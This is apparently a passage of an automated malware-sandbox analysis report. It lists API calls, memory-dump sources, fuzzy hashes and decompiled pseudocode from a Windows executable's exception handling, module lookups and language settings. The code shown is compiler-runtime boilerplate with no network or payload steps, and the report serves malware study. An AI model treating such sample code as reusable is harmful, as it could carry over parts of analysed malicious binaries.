                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction ID: 159507dc0b18154136d1bcbfb5456832f98e7bfede83e1a1bdaa672f553d1982
                                                • Opcode Fuzzy Hash: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction Fuzzy Hash: ED318120A00F41DFDF31AB79888D71A7BE46B14394F16C829E54DA729AD77CEC88CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0077621E
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0077625B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: h`@$h`@
                                                • API String ID: 3192549508-260506153
                                                • Opcode ID: c3bcd7a7115e3f9042ecd462c28f039e3290c599e2e0e79360682854d97f69cb
                                                • Instruction ID: 4d6f241e8aa6a13b7a2fa5bb95c9adbf2fd7e89c224b92cdc9d3e6d572c4b6df
                                                • Opcode Fuzzy Hash: c3bcd7a7115e3f9042ecd462c28f039e3290c599e2e0e79360682854d97f69cb
                                                • Instruction Fuzzy Hash: 03317CB0604600AFEB64DB14C888F2B77A9FB85794F18C659E50C97256CB3CEC51CB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00405704,004056E4), ref: 00775885
                                                • GetProcAddress.KERNEL32(00000000,00405704), ref: 0077588B
                                                • GetLastError.KERNEL32(00000000,?,00000000,00405704,004056E4), ref: 007758A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: AddressErrorHandleLastModuleProc
                                                • String ID: @
                                                • API String ID: 4275029093-2766056989
                                                • Opcode ID: 5f6edf7398b59d43bd50dce053ac9b3a2b15859288e47cbb4df52aa4161e66a0
                                                • Instruction ID: a4122b9bc18376403315edbaf8bf0cc9350fa0e39a770b2f30ca1428055dcad5
                                                • Opcode Fuzzy Hash: 5f6edf7398b59d43bd50dce053ac9b3a2b15859288e47cbb4df52aa4161e66a0
                                                • Instruction Fuzzy Hash: CA117270E00648EFDF10DBA4C949B5DB7B8EB05390F11C4A6E91CA7182E77D9A40CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E004173A0(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				char _v534;
                                                				short _v1056;
                                                				short _v1568;
                                                				struct _MEMORY_BASIC_INFORMATION _v1596;
                                                				char _v1600;
                                                				intOrPtr _v1604;
                                                				char _v1608;
                                                				intOrPtr _v1612;
                                                				char _v1616;
                                                				intOrPtr _v1620;
                                                				char _v1624;
                                                				char* _v1628;
                                                				char _v1632;
                                                				char _v1636;
                                                				char _v1640;
                                                				intOrPtr _t55;
                                                				signed int _t76;
                                                				void* _t82;
                                                				intOrPtr _t83;
                                                				intOrPtr _t95;
                                                				intOrPtr _t98;
                                                				intOrPtr _t100;
                                                				intOrPtr* _t102;
                                                				void* _t105;
                                                
                                                				_v1640 = 0;
                                                				_v8 = __ecx;
                                                				_t82 = __edx;
                                                				_t102 = __eax;
                                                				_push(_t105);
                                                				_push(0x41754c);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t105 + 0xfffff99c;
                                                				VirtualQuery(__edx,  &_v1596, 0x1c);
                                                				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
                                                					GetModuleFileNameW( *0x503620,  &_v1056, 0x105);
                                                					_v12 = E00417394(_t82);
                                                				} else {
                                                					_v12 = _t82 - _v1596.AllocationBase;
                                                				}
                                                				E00414AD8( &_v534, 0x104, E00418924() + 2);
                                                				_t83 = 0x417560;
                                                				_t100 = 0x417560;
                                                				_t95 =  *0x411ad4; // 0x411b2c
                                                				if(E00405190(_t102, _t95) != 0) {
                                                					_t83 = E00407330( *((intOrPtr*)(_t102 + 4)));
                                                					_t76 = E00406DB8(_t83);
                                                					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
                                                						_t100 = 0x417564;
                                                					}
                                                				}
                                                				_t55 =  *0x4ff12c; // 0x40c150
                                                				_t18 = _t55 + 4; // 0xffea
                                                				LoadStringW(E00408664( *0x503620),  *_t18,  &_v1568, 0x100);
                                                				E00404D0C( *_t102,  &_v1640);
                                                				_v1636 = _v1640;
                                                				_v1632 = 0x11;
                                                				_v1628 =  &_v534;
                                                				_v1624 = 0xa;
                                                				_v1620 = _v12;
                                                				_v1616 = 5;
                                                				_v1612 = _t83;
                                                				_v1608 = 0xa;
                                                				_v1604 = _t100;
                                                				_v1600 = 0xa;
                                                				E00414C18(4,  &_v1636);
                                                				E00406DB8(_v8);
                                                				_pop(_t98);
                                                				 *[fs:eax] = _t98;
                                                				_push(0x417553);
                                                				return E004069A8( &_v1640);
                                                			}





























                                                0x004173ae
                                                0x004173b4
                                                0x004173b7
                                                0x004173b9
                                                0x004173bd
                                                0x004173be
                                                0x004173c3
                                                0x004173c6
                                                0x004173d3
                                                0x004173e2
                                                0x00417412
                                                0x0041741e
                                                0x00417423
                                                0x00417429
                                                0x00417429
                                                0x0041744b
                                                0x00417450
                                                0x00417455
                                                0x0041745c
                                                0x00417469
                                                0x00417473
                                                0x00417477
                                                0x0041747e
                                                0x00417488
                                                0x00417488
                                                0x0041747e
                                                0x00417499
                                                0x0041749e
                                                0x004174ad
                                                0x004174ba
                                                0x004174c5
                                                0x004174cb
                                                0x004174d8
                                                0x004174de
                                                0x004174e8
                                                0x004174ee
                                                0x004174f5
                                                0x004174fb
                                                0x00417502
                                                0x00417508
                                                0x00417524
                                                0x0041752c
                                                0x00417535
                                                0x00417538
                                                0x0041753b
                                                0x0041754b

                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041754C), ref: 004173D3
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004173F7
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00417412
                                                • LoadStringW.USER32(00000000,0000FFEA,?,00000100), ref: 004174AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                • String ID:
                                                • API String ID: 3990497365-0
                                                • Opcode ID: 0e4673a18678baf22685d2963611963e236131dd4c1e7acec65ecb95e0382641
                                                • Instruction ID: 9442957bc2cbf2ec707a5283f17e7f6dfd39538e8e34a022e56a37078e0b6c55
                                                • Opcode Fuzzy Hash: 0e4673a18678baf22685d2963611963e236131dd4c1e7acec65ecb95e0382641
                                                • Instruction Fuzzy Hash: B0411B70A042189FDB20DF65CC81BDAB7BAAB98304F4140EAA508E7251D7799E94CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00778F9D
                                                • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00778FFB
                                                • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00779058
                                                • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0077908B
                                                  • Part of subcall function 00778F48: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00779009), ref: 00778F5F
                                                  • Part of subcall function 00778F48: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00779009), ref: 00778F7C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Thread$LanguagesPreferred$Language
                                                • String ID:
                                                • API String ID: 2255706666-0
                                                • Opcode ID: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction ID: 71088f28729be0048893a5ca0e7513b2c416a51a9315373668d242023755c8cd
                                                • Opcode Fuzzy Hash: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction Fuzzy Hash: 79316030E1011EDBDF50DFA8C888AAEB3B5FF14341F408165E659E7291DB789E05CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00408D3C(signed short __eax, void* __edx) {
                                                				char _v8;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				short _v22;
                                                				short _v24;
                                                				char _v26;
                                                				char _v32;
                                                				void* __ebp;
                                                				void* _t39;
                                                				void* _t55;
                                                				void* _t59;
                                                				short* _t62;
                                                				signed short _t66;
                                                				void* _t67;
                                                				void* _t68;
                                                				signed short _t79;
                                                				void* _t81;
                                                
                                                				_t81 = __edx;
                                                				_t66 = __eax;
                                                				_v16 = 0;
                                                				if(__eax !=  *0x502c04()) {
                                                					_v16 = E00408CF8( &_v8);
                                                					_t79 = _t66;
                                                					_v20 = 3;
                                                					_t62 =  &_v26;
                                                					do {
                                                						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                						_v20 = _v20 - 1;
                                                						_t62 = _t62 - 2;
                                                					} while (_v20 != 0xffffffff);
                                                					_v24 = 0;
                                                					_v22 = 0;
                                                					 *0x502c00(4,  &_v32,  &_v20);
                                                				}
                                                				_t39 = E00408CF8( &_v12);
                                                				_t67 = _t39;
                                                				if(_t67 != 0) {
                                                					_t55 = _v12 - 2;
                                                					if(_t55 >= 0) {
                                                						_t59 = _t55 + 1;
                                                						_v20 = 0;
                                                						do {
                                                							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                							}
                                                							_v20 = _v20 + 1;
                                                							_t59 = _t59 - 1;
                                                						} while (_t59 != 0);
                                                					}
                                                					E00407388(_t81, _t67);
                                                					_t39 = E004044D0(_t67);
                                                				}
                                                				if(_v16 != 0) {
                                                					 *0x502c00(0, 0,  &_v20);
                                                					_t68 = E00408CF8( &_v12);
                                                					if(_v8 != _v12 || E00408CD4(_v16, _v12, _t68) != 0) {
                                                						 *0x502c00(8, _v16,  &_v20);
                                                					}
                                                					E004044D0(_t68);
                                                					return E004044D0(_v16);
                                                				}
                                                				return _t39;
                                                			}





















                                                0x00408d44
                                                0x00408d46
                                                0x00408d4a
                                                0x00408d56
                                                0x00408d60
                                                0x00408d63
                                                0x00408d65
                                                0x00408d6c
                                                0x00408d6f
                                                0x00408d80
                                                0x00408d86
                                                0x00408d89
                                                0x00408d8c
                                                0x00408d8f
                                                0x00408d95
                                                0x00408d9b
                                                0x00408dab
                                                0x00408dab
                                                0x00408db4
                                                0x00408db9
                                                0x00408dbd
                                                0x00408dc2
                                                0x00408dc7
                                                0x00408dc9
                                                0x00408dca
                                                0x00408dd1
                                                0x00408dd9
                                                0x00408dde
                                                0x00408dde
                                                0x00408de4
                                                0x00408de7
                                                0x00408de7
                                                0x00408dd1
                                                0x00408dee
                                                0x00408df5
                                                0x00408df5
                                                0x00408dfe
                                                0x00408e08
                                                0x00408e16
                                                0x00408e1e
                                                0x00408e3b
                                                0x00408e3b
                                                0x00408e43
                                                0x00000000
                                                0x00408e4b
                                                0x00408e55

                                                APIs
                                                • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408D4D
                                                • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408DAB
                                                • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408E08
                                                • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408E3B
                                                  • Part of subcall function 00408CF8: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408DB9), ref: 00408D0F
                                                  • Part of subcall function 00408CF8: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408DB9), ref: 00408D2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Thread$LanguagesPreferred$Language
                                                • String ID:
                                                • API String ID: 2255706666-0
                                                • Opcode ID: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction ID: 1047a55321476b545476524d9605cfe666873ad8380eb7f67878ffd240dfdd41
                                                • Opcode Fuzzy Hash: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction Fuzzy Hash: 3A316F70A0021AABDB10EBA9C984AAEB3B5FF14304F40417AE555F72D1DB789E04DB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0041801C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				char _v8;
                                                				struct _MEMORY_BASIC_INFORMATION _v36;
                                                				short _v558;
                                                				char _v564;
                                                				intOrPtr _v568;
                                                				char _v572;
                                                				char _v576;
                                                				char _v580;
                                                				intOrPtr _v584;
                                                				char _v588;
                                                				void* _v592;
                                                				char _v596;
                                                				char _v600;
                                                				char _v604;
                                                				char _v608;
                                                				intOrPtr _v612;
                                                				char _v616;
                                                				char _v620;
                                                				char _v624;
                                                				void* _v628;
                                                				char _v632;
                                                				void* _t64;
                                                				intOrPtr _t65;
                                                				intOrPtr _t82;
                                                				intOrPtr _t103;
                                                				intOrPtr _t107;
                                                				intOrPtr _t110;
                                                				intOrPtr _t112;
                                                				intOrPtr _t115;
                                                				intOrPtr _t127;
                                                				void* _t136;
                                                				intOrPtr _t138;
                                                				void* _t141;
                                                				void* _t143;
                                                
                                                				_t136 = __edi;
                                                				_t140 = _t141;
                                                				_v632 = 0;
                                                				_v596 = 0;
                                                				_v604 = 0;
                                                				_v600 = 0;
                                                				_v8 = 0;
                                                				_push(_t141);
                                                				_push(0x418222);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t141 + 0xfffffd8c;
                                                				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
                                                				_t143 = _t64;
                                                				if(_t143 < 0) {
                                                					_t65 =  *0x4ff144; // 0x40c178
                                                					E0040AF40(_t65,  &_v8, _t140);
                                                				} else {
                                                					if(_t143 == 0) {
                                                						_t107 =  *0x4ff0a8; // 0x40c180
                                                						E0040AF40(_t107,  &_v8, _t140);
                                                					} else {
                                                						if(_t64 == 7) {
                                                							_t110 =  *0x4fef9c; // 0x40c188
                                                							E0040AF40(_t110,  &_v8, _t140);
                                                						} else {
                                                							_t112 =  *0x4ff04c; // 0x40c190
                                                							E0040AF40(_t112,  &_v8, _t140);
                                                						}
                                                					}
                                                				}
                                                				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
                                                				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
                                                				_t138 = _v36.State;
                                                				if(_t138 == 0x1000 || _t138 == 0x10000) {
                                                					if(GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105) == 0) {
                                                						goto L12;
                                                					} else {
                                                						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                						_v588 = 5;
                                                						E004073C4( &_v600, 0x105,  &_v558);
                                                						E004149FC(_v600, 0x105,  &_v596);
                                                						_v584 = _v596;
                                                						_v580 = 0x11;
                                                						_v576 = _v8;
                                                						_v572 = 0x11;
                                                						_v568 = _t115;
                                                						_v564 = 5;
                                                						_push( &_v592);
                                                						_t103 =  *0x4ff0dc; // 0x40c210
                                                						E0040AF40(_t103,  &_v604, _t140, 3);
                                                						E00417718(_t115, _v604, 1, _t136, _t138);
                                                					}
                                                				} else {
                                                					L12:
                                                					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                					_v624 = 5;
                                                					_v620 = _v8;
                                                					_v616 = 0x11;
                                                					_v612 = _t115;
                                                					_v608 = 5;
                                                					_push( &_v628);
                                                					_t82 =  *0x4ff0ac; // 0x40c128
                                                					E0040AF40(_t82,  &_v632, _t140, 2);
                                                					E00417718(_t115, _v632, 1, _t136, _t138);
                                                				}
                                                				_pop(_t127);
                                                				 *[fs:eax] = _t127;
                                                				_push(0x418229);
                                                				E004069A8( &_v632);
                                                				E00406A08( &_v604, 3);
                                                				return E004069A8( &_v8);
                                                			}





































                                                0x0041801c
                                                0x0041801d
                                                0x00418029
                                                0x0041802f
                                                0x00418035
                                                0x0041803b
                                                0x00418041
                                                0x00418046
                                                0x00418047
                                                0x0041804c
                                                0x0041804f
                                                0x0041805b
                                                0x0041805b
                                                0x0041805e
                                                0x0041806c
                                                0x00418071
                                                0x00418060
                                                0x00418060
                                                0x0041807b
                                                0x00418080
                                                0x00418062
                                                0x00418065
                                                0x0041808a
                                                0x0041808f
                                                0x00418067
                                                0x00418099
                                                0x0041809e
                                                0x0041809e
                                                0x00418065
                                                0x00418060
                                                0x004180a9
                                                0x004180bc
                                                0x004180c1
                                                0x004180ca
                                                0x004180ef
                                                0x00000000
                                                0x004180f5
                                                0x004180fe
                                                0x00418104
                                                0x0041811c
                                                0x0041812d
                                                0x00418138
                                                0x0041813e
                                                0x00418148
                                                0x0041814e
                                                0x00418155
                                                0x0041815b
                                                0x00418168
                                                0x00418171
                                                0x00418176
                                                0x00418188
                                                0x0041818d
                                                0x00418191
                                                0x00418191
                                                0x0041819a
                                                0x004181a0
                                                0x004181aa
                                                0x004181b0
                                                0x004181b7
                                                0x004181bd
                                                0x004181ca
                                                0x004181d3
                                                0x004181d8
                                                0x004181ea
                                                0x004181ef
                                                0x004181f3
                                                0x004181f6
                                                0x004181f9
                                                0x00418204
                                                0x00418214
                                                0x00418221

                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00418222), ref: 004180BC
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00418222), ref: 004180E8
                                                  • Part of subcall function 0040AF40: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040AF85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileLoadModuleNameQueryStringVirtual
                                                • String ID: d.A
                                                • API String ID: 902310565-3125002948
                                                • Opcode ID: b42593c92c92184516b9cef0d76e77f21b4aab7d58c08c1544ea3ad1d4ed0584
                                                • Instruction ID: 525eca4c3fd5eb5eb0a7a0e6142f0cf4160a84f628be2892f59521738665aab3
                                                • Opcode Fuzzy Hash: b42593c92c92184516b9cef0d76e77f21b4aab7d58c08c1544ea3ad1d4ed0584
                                                • Instruction Fuzzy Hash: 65510B74A04659DFCB10DF28CD88ADDBBF4AB08304F1141EAA908E7351DB78AE84CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00418222), ref: 0078830C
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00418222), ref: 00788338
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileModuleNameQueryVirtual
                                                • String ID: d.A
                                                • API String ID: 2827130835-3125002948
                                                • Opcode ID: cfa5a9ee4bcfd4e326f6554e8350daa400a7c1724553340675d3a2f381e2dbdc
                                                • Instruction ID: f5145ad5f6c0152b86f27cdb35e77e03fa510ab6be862c62a7823d36938efe05
                                                • Opcode Fuzzy Hash: cfa5a9ee4bcfd4e326f6554e8350daa400a7c1724553340675d3a2f381e2dbdc
                                                • Instruction Fuzzy Hash: 93310734A04658DFCB50EF68CD88AADBBF5BB08340F5081A5E808E7361D778AE84CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E00405F62(void* __ebx, void* __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				intOrPtr _v8;
                                                				struct _EXCEPTION_RECORD* _t22;
                                                				intOrPtr* _t25;
                                                				long _t28;
                                                				long _t30;
                                                				long _t31;
                                                				long _t32;
                                                				void* _t33;
                                                				void* _t38;
                                                				long _t41;
                                                				intOrPtr* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t48;
                                                				intOrPtr _t50;
                                                
                                                				_t48 = __ebp;
                                                				_t47 = __esi;
                                                				_t45 = __edi;
                                                				_t33 = __ebx;
                                                				_t22 = _a4.ExceptionRecord;
                                                				if((_t22->ExceptionFlags & 0x00000006) == 0) {
                                                					_t41 = _t22->ExceptionInformation[1];
                                                					_t38 = _t22->ExceptionInformation;
                                                					if(_t22->ExceptionCode == 0xeedfade) {
                                                						L11:
                                                						if( *0x4fd025 <= 1 ||  *0x4fd024 > 0) {
                                                							goto L14;
                                                						}
                                                						_t28 = UnhandledExceptionFilter( &_a4);
                                                						_t38 = _t38;
                                                						_t41 = _t41;
                                                						_t22 = _t22;
                                                						if(_t28 != 0) {
                                                							goto L14;
                                                						}
                                                					} else {
                                                						asm("cld");
                                                						E00404CF0(_t22);
                                                						_t43 =  *0x500018; // 0x0
                                                						if(_t43 != 0) {
                                                							_t30 =  *_t43();
                                                							if(_t30 != 0) {
                                                								_t44 = _a12;
                                                								if(_a4.ExceptionRecord->ExceptionCode == 0xeefface) {
                                                									L10:
                                                									_t41 = _t30;
                                                									_t22 = _a4.ExceptionRecord;
                                                									_t38 = _t22->ExceptionAddress;
                                                									goto L11;
                                                								} else {
                                                									_t30 = E00405E90(_t30, _t44, __edi);
                                                									if( *0x4fd025 <= 0 ||  *0x4fd024 > 0) {
                                                										goto L10;
                                                									} else {
                                                										_t31 = UnhandledExceptionFilter( &_a4);
                                                										_t32 = _t30;
                                                										if(_t31 != 0) {
                                                											_t41 = _t32;
                                                											_t22 = _a4.ExceptionRecord;
                                                											_t38 = _t22->ExceptionAddress;
                                                											L14:
                                                											_t22->ExceptionFlags = _t22->ExceptionFlags | 0x00000002;
                                                											 *0x500020(_a8, 0x40603c, _t22, 0, _t38, _t41, _t22,  *[fs:ebx], _t48, _t45, _t47, _t33);
                                                											_t46 = _v8;
                                                											_t25 = E0040B254();
                                                											_push( *_t25);
                                                											 *_t25 = _t50;
                                                											 *((intOrPtr*)(_v8 + 4)) = E00406068;
                                                											E00405ECC(_t25,  *((intOrPtr*)(_t46 + 4)) + 5, _t47);
                                                											goto __ebx;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return 1;
                                                			}



















                                                0x00405f62
                                                0x00405f62
                                                0x00405f62
                                                0x00405f62
                                                0x00405f64
                                                0x00405f6f
                                                0x00405f7b
                                                0x00405f7e
                                                0x00405f81
                                                0x00405ff1
                                                0x00405ff8
                                                0x00000000
                                                0x00000000
                                                0x0040600b
                                                0x00406013
                                                0x00406014
                                                0x00406015
                                                0x00406016
                                                0x00000000
                                                0x00000000
                                                0x00405f83
                                                0x00405f83
                                                0x00405f84
                                                0x00405f89
                                                0x00405f91
                                                0x00405f97
                                                0x00405f9b
                                                0x00405fa1
                                                0x00405faf
                                                0x00405fe8
                                                0x00405fe8
                                                0x00405fea
                                                0x00405fee
                                                0x00000000
                                                0x00405fb1
                                                0x00405fb1
                                                0x00405fbd
                                                0x00000000
                                                0x00405fc8
                                                0x00405fce
                                                0x00405fd6
                                                0x00405fd7
                                                0x00405fdd
                                                0x00405fdf
                                                0x00405fe3
                                                0x00406018
                                                0x00406018
                                                0x00406036
                                                0x0040603c
                                                0x00406040
                                                0x00406045
                                                0x0040604b
                                                0x00406057
                                                0x00406061
                                                0x00406066
                                                0x00406066
                                                0x00405fd7
                                                0x00405fbd
                                                0x00405faf
                                                0x00405f9b
                                                0x00405f91
                                                0x00405f81
                                                0x0040608d

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405FCE
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00005F64), ref: 0040600B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: |'@
                                                • API String ID: 3192549508-246660051
                                                • Opcode ID: 5daa1cd48c89220020c054309c4a92c65f499552fbca0f12ab2ab44c6d7456c2
                                                • Instruction ID: c47cca87b62f3344d8f6197094fff981340a7294386157ef5818deb2500a34ec
                                                • Opcode Fuzzy Hash: 5daa1cd48c89220020c054309c4a92c65f499552fbca0f12ab2ab44c6d7456c2
                                                • Instruction Fuzzy Hash: ED317C70604201AFE320DB14C888F2BB7E9EB88714F59C56EE849A72D1C738EC55CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0077621E
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0077625B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: h`@$h`@
                                                • API String ID: 3192549508-260506153
                                                • Opcode ID: 9aae00d555ed47a26df3ac35eabf8a4c45b95ebfaa01d97bb4fbe5a8c811ebfe
                                                • Instruction ID: d233a6b7be1dc98254f94d51ff406ecddd089077756b6374de78b8f9a42e1b3e
                                                • Opcode Fuzzy Hash: 9aae00d555ed47a26df3ac35eabf8a4c45b95ebfaa01d97bb4fbe5a8c811ebfe
                                                • Instruction Fuzzy Hash: 1D2158B0604600AFDB24DB14C889F2BB7A9FB89784F19C658E50857256CB38EC50CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0077625B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: h`@$h`@
                                                • API String ID: 3192549508-260506153
                                                • Opcode ID: 5dcfbe91997fda09dda9f410798b7811f6f2ae19734f0890e2cdf2b9de41c9ef
                                                • Instruction ID: 902dab4390311bf552edb4148f78d6ca4fc98488fb9d515ac28604e73b3957a4
                                                • Opcode Fuzzy Hash: 5dcfbe91997fda09dda9f410798b7811f6f2ae19734f0890e2cdf2b9de41c9ef
                                                • Instruction Fuzzy Hash: 1001DEB1104780BFEB109B50CC8AF67BBB8FB49794F15C96EF10892153C728A856CA75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419498() {
                                                				void* __ebx;
                                                				struct HINSTANCE__* _t1;
                                                				void* _t4;
                                                
                                                				_t1 = GetModuleHandleW(L"kernel32.dll");
                                                				_t3 = _t1;
                                                				if(_t1 != 0) {
                                                					_t1 = E0040BE94(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
                                                					 *0x4fde1c = _t1;
                                                				}
                                                				if( *0x4fde1c == 0) {
                                                					 *0x4fde1c = E00414A38;
                                                					return E00414A38;
                                                				}
                                                				return _t1;
                                                			}






                                                0x0041949e
                                                0x004194a3
                                                0x004194a7
                                                0x004194af
                                                0x004194b4
                                                0x004194b4
                                                0x004194c0
                                                0x004194c7
                                                0x00000000
                                                0x004194c7
                                                0x004194cd

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,004FC4D3,00000000,004FC50A), ref: 0041949E
                                                  • Part of subcall function 0040BE94: GetProcAddress.KERNEL32(?,?), ref: 0040BEBE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                • API String ID: 1646373207-1127948838
                                                • Opcode ID: 79d50ef1922d0a428f94ee757ce890a5fb7e45e2f119e74be6d5f260fdc1a8d1
